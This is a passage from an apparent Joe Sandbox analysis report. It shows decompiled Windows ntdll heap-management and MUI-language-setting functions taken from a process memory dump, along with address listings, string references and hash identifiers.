                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                        • API String ID: 0-1745908468
                                                                        • Opcode ID: 492241cd001e5517079000bc6f5f7e65c4d98150ee4a3e386abb1d7b5e242ec6
                                                                        • Instruction ID: 0ed7277a9c88d1b170ca99c131c696fc3fff14ce9056f69007906c2ede9a6276
                                                                        • Opcode Fuzzy Hash: 492241cd001e5517079000bc6f5f7e65c4d98150ee4a3e386abb1d7b5e242ec6
                                                                        • Instruction Fuzzy Hash: 2A913435B10645DFCB22DFA8C469AADBBF2FF88710F18845DE4469BB51CB369942CB10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055B3D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E055B3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E055B1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E055B1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E055B1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E055B1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E055B1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L055C4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E055EF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E055F1370(_t276, 0x5584e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E055EBB40(0,  &_v68, _t170);
									if(L055B43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E055EBB40(_t257,  &_v68, _t243);
								if(L055B43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E055F1370(_t278, 0x5584e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L055C4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E055EF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E055F1370(_v16, 0x5584e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E055EBB40(_t262,  &_v68, _t244);
								if(L055B43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E055F1370(_t282, 0x5584e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E055EBB40(_t262,  &_v68, _t201);
							if(L055B43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L055C4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E055EF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E055F1370(_t280, 0x5584e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E055EBB40(_t267,  &_v68, _t245);
							if(L055B43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E055F1370(_t284, 0x5584e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E055EBB40(_t267,  &_v68, _t224);
						if(L055B43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L055C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                        0x055b3d3c
                                                                        0x055b3d42
                                                                        0x055b3d44
                                                                        0x055b3d46
                                                                        0x055b3d49
                                                                        0x055b3d4c
                                                                        0x055b3d4f
                                                                        0x055b3d52
                                                                        0x055b3d55
                                                                        0x055b3d58
                                                                        0x055b3d5b
                                                                        0x055b3d5f
                                                                        0x055b3d61
                                                                        0x055b3d66
                                                                        0x05608213
                                                                        0x05608218
                                                                        0x055b4085
                                                                        0x055b4088
                                                                        0x055b408e
                                                                        0x055b4094
                                                                        0x055b409a
                                                                        0x055b40a0
                                                                        0x055b40a6
                                                                        0x055b40a9
                                                                        0x055b40af
                                                                        0x055b40b6
                                                                        0x055b40bd
                                                                        0x055b40bd
                                                                        0x055b3d83
                                                                        0x0560821f
                                                                        0x05608229
                                                                        0x05608238
                                                                        0x05608238
                                                                        0x0560823d
                                                                        0x0560823d
                                                                        0x055b3da0
                                                                        0x055b3daf
                                                                        0x055b3db5
                                                                        0x055b3dba
                                                                        0x055b3dba
                                                                        0x055b3dd4
                                                                        0x055b3e94
                                                                        0x055b3eab
                                                                        0x055b3f6d
                                                                        0x055b3f84
                                                                        0x055b406b
                                                                        0x055b406b
                                                                        0x055b406e
                                                                        0x055b406e
                                                                        0x055b4070
                                                                        0x055b4074
                                                                        0x05608351
                                                                        0x05608351
                                                                        0x055b407a
                                                                        0x055b407f
                                                                        0x0560835d
                                                                        0x05608370
                                                                        0x05608377
                                                                        0x05608379
                                                                        0x0560837c
                                                                        0x0560837c
                                                                        0x0560835d
                                                                        0x00000000
                                                                        0x055b407f
                                                                        0x055b3f8a
                                                                        0x055b3f8d
                                                                        0x055b3f90
                                                                        0x055b3f95
                                                                        0x0560830d
                                                                        0x0560830f
                                                                        0x055b3f9b
                                                                        0x055b3fac
                                                                        0x055b3fae
                                                                        0x055b3fb1
                                                                        0x055b3fb1
                                                                        0x055b3fb6
                                                                        0x05608317
                                                                        0x0560831a
                                                                        0x00000000
                                                                        0x055b3fbc
                                                                        0x055b3fc1
                                                                        0x055b3fc9
                                                                        0x055b3fd7
                                                                        0x055b3fda
                                                                        0x055b3fdd
                                                                        0x055b4021
                                                                        0x055b4021
                                                                        0x055b4029
                                                                        0x055b4030
                                                                        0x055b4044
                                                                        0x055b4046
                                                                        0x055b4046
                                                                        0x055b4044
                                                                        0x055b4049
                                                                        0x05608327
                                                                        0x05608334
                                                                        0x05608339
                                                                        0x0560833c
                                                                        0x055b404f
                                                                        0x055b404f
                                                                        0x055b404f
                                                                        0x055b4051
                                                                        0x055b4056
                                                                        0x055b4063
                                                                        0x055b4063
                                                                        0x055b4068
                                                                        0x00000000
                                                                        0x055b4068
                                                                        0x055b3fdf
                                                                        0x055b3fe2
                                                                        0x055b3fe4
                                                                        0x055b3fe7
                                                                        0x055b3fef
                                                                        0x055b4003
                                                                        0x055b4005
                                                                        0x055b4005
                                                                        0x055b400c
                                                                        0x055b4013
                                                                        0x055b4016
                                                                        0x055b4017
                                                                        0x055b401b
                                                                        0x055b401e
                                                                        0x00000000
                                                                        0x055b401e
                                                                        0x055b3fb6
                                                                        0x055b3eb1
                                                                        0x055b3eb4
                                                                        0x055b3eb7
                                                                        0x055b3ebc
                                                                        0x056082a9
                                                                        0x056082ab
                                                                        0x055b3ec2
                                                                        0x055b3ed3
                                                                        0x055b3ed5
                                                                        0x055b3ed8
                                                                        0x055b3ed8
                                                                        0x055b3edd
                                                                        0x056082b3
                                                                        0x056082b6
                                                                        0x00000000
                                                                        0x055b3ee3
                                                                        0x055b3ee8
                                                                        0x055b3eed
                                                                        0x055b3ef0
                                                                        0x055b3ef3
                                                                        0x055b3f02
                                                                        0x055b3f05
                                                                        0x055b3f08
                                                                        0x056082c0
                                                                        0x056082c3
                                                                        0x056082c5
                                                                        0x056082c8
                                                                        0x056082d0
                                                                        0x056082e4
                                                                        0x056082e6
                                                                        0x056082e6
                                                                        0x056082ed
                                                                        0x056082f4
                                                                        0x056082f7
                                                                        0x056082f8
                                                                        0x056082fc
                                                                        0x056082ff
                                                                        0x056082ff
                                                                        0x055b3f0e
                                                                        0x055b3f11
                                                                        0x055b3f16
                                                                        0x055b3f1d
                                                                        0x055b3f31
                                                                        0x05608307
                                                                        0x05608307
                                                                        0x055b3f31
                                                                        0x055b3f39
                                                                        0x055b3f48
                                                                        0x055b3f4d
                                                                        0x055b3f50
                                                                        0x055b3f50
                                                                        0x055b3f53
                                                                        0x055b3f58
                                                                        0x055b3f65
                                                                        0x055b3f65
                                                                        0x055b3f6a
                                                                        0x00000000
                                                                        0x055b3f6a
                                                                        0x055b3edd
                                                                        0x055b3dda
                                                                        0x055b3ddd
                                                                        0x055b3de0
                                                                        0x055b3de5
                                                                        0x05608245
                                                                        0x055b3deb
                                                                        0x055b3df7
                                                                        0x055b3dfc
                                                                        0x055b3dfe
                                                                        0x055b3e01
                                                                        0x055b3e01
                                                                        0x055b3e06
                                                                        0x0560824d
                                                                        0x0560824f
                                                                        0x05608254
                                                                        0x00000000
                                                                        0x055b3e0c
                                                                        0x055b3e11
                                                                        0x055b3e16
                                                                        0x055b3e19
                                                                        0x055b3e29
                                                                        0x055b3e2c
                                                                        0x055b3e2f
                                                                        0x0560825c
                                                                        0x0560825f
                                                                        0x05608261
                                                                        0x05608264
                                                                        0x0560826c
                                                                        0x05608280
                                                                        0x05608282
                                                                        0x05608282
                                                                        0x05608289
                                                                        0x05608290
                                                                        0x05608293
                                                                        0x05608294
                                                                        0x05608298
                                                                        0x0560829b
                                                                        0x0560829b
                                                                        0x055b3e35
                                                                        0x055b3e38
                                                                        0x055b3e3d
                                                                        0x055b3e44
                                                                        0x055b3e58
                                                                        0x056082a3
                                                                        0x056082a3
                                                                        0x055b3e58
                                                                        0x055b3e60
                                                                        0x055b3e6f
                                                                        0x055b3e74
                                                                        0x055b3e77
                                                                        0x055b3e77
                                                                        0x055b3e7a
                                                                        0x055b3e7f
                                                                        0x055b3e8c
                                                                        0x055b3e8c
                                                                        0x055b3e91
                                                                        0x00000000
                                                                        0x055b3e91

                                                                        Strings
                                                                        • Kernel-MUI-Language-SKU, xrefs: 055B3F70
                                                                        • WindowsExcludedProcs, xrefs: 055B3D6F
                                                                        • Kernel-MUI-Language-Allowed, xrefs: 055B3DC0
                                                                        • Kernel-MUI-Number-Allowed, xrefs: 055B3D8C
                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 055B3E97
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                        • API String ID: 0-258546922
                                                                        • Opcode ID: 065c92e16a33720168c57b20735423d83c656133483f8606cb8190599bded935
                                                                        • Instruction ID: e9cb69ab72fc5528d9ca8fb0369f3febcb359747cb686fa8322e51675cddaa20
                                                                        • Opcode Fuzzy Hash: 065c92e16a33720168c57b20735423d83c656133483f8606cb8190599bded935
                                                                        • Instruction Fuzzy Hash: F7F16D72E00619EFDF25DF98C988EEEBBB9FF48650F15045AE905A7250E7709E01CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055A40E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 29%
                                                                        			E055A40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E055AB150();
					} else {
						E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E055AB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E055AB150(", passed to %s", _t29);
					}
					_push("\n");
					E055AB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x5696378 = 1;
						asm("int3");
						 *0x5696378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                        0x055a40e6
                                                                        0x055a40e8
                                                                        0x055a40f1
                                                                        0x0560042d
                                                                        0x0560044c
                                                                        0x05600451
                                                                        0x0560042f
                                                                        0x05600444
                                                                        0x05600449
                                                                        0x0560045d
                                                                        0x05600466
                                                                        0x0560046e
                                                                        0x05600474
                                                                        0x05600475
                                                                        0x0560047a
                                                                        0x0560048a
                                                                        0x0560048c
                                                                        0x05600493
                                                                        0x05600494
                                                                        0x05600494
                                                                        0x00000000
                                                                        0x0560049b
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                        • API String ID: 0-188067316
                                                                        • Opcode ID: 30862c5a6e996939669b5d1b40f091028471e171e8bb9b9a39283ecb72451cfb
                                                                        • Instruction ID: bbfdd2ea47f2888cc393e614a00230b216eff4d99b441e67bade75dcc5533b8a
                                                                        • Opcode Fuzzy Hash: 30862c5a6e996939669b5d1b40f091028471e171e8bb9b9a39283ecb72451cfb
                                                                        • Instruction Fuzzy Hash: 2E017033214241EED31DAB64E44EF6777A4FB40F30F295169F00957B81CAF49840D154
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 055CA830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E055CA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x5698748 - 1;
					if( *0x5698748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E055AB150();
									_t260 = _t257 + 4;
								} else {
									E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E055AB150();
								_t257 = _t260 + 4;
								__eflags =  *0x5697bc8;
								if(__eflags == 0) {
									E05662073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0566A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E055FD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E055CAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0566A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0566A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x5698748 - 1;
					if( *0x5698748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E055AB150();
							} else {
								E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E055AB150();
							__eflags =  *0x5697bc8;
							if(__eflags == 0) {
								_t131 = E05662073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                                        0x055ca83a
                                                                        0x055ca83c
                                                                        0x055ca83e
                                                                        0x055ca841
                                                                        0x055ca844
                                                                        0x055ca84a
                                                                        0x055caa53
                                                                        0x055caa59
                                                                        0x055caa59
                                                                        0x055ca858
                                                                        0x055ca85e
                                                                        0x055caaf5
                                                                        0x055caafc
                                                                        0x0561229e
                                                                        0x056122a2
                                                                        0x056122a8
                                                                        0x056122b3
                                                                        0x056122b5
                                                                        0x056122bb
                                                                        0x056122c1
                                                                        0x056122c5
                                                                        0x056122e6
                                                                        0x056122eb
                                                                        0x056122f0
                                                                        0x056122c7
                                                                        0x056122dc
                                                                        0x056122e1
                                                                        0x056122e1
                                                                        0x056122f3
                                                                        0x056122f8
                                                                        0x056122fd
                                                                        0x05612300
                                                                        0x05612307
                                                                        0x0561230e
                                                                        0x0561230e
                                                                        0x05612313
                                                                        0x05612313
                                                                        0x056122b5
                                                                        0x056122a2
                                                                        0x055caafc
                                                                        0x055ca864
                                                                        0x055ca869
                                                                        0x055caa5c
                                                                        0x055caa5e
                                                                        0x055ca86f
                                                                        0x055ca87f
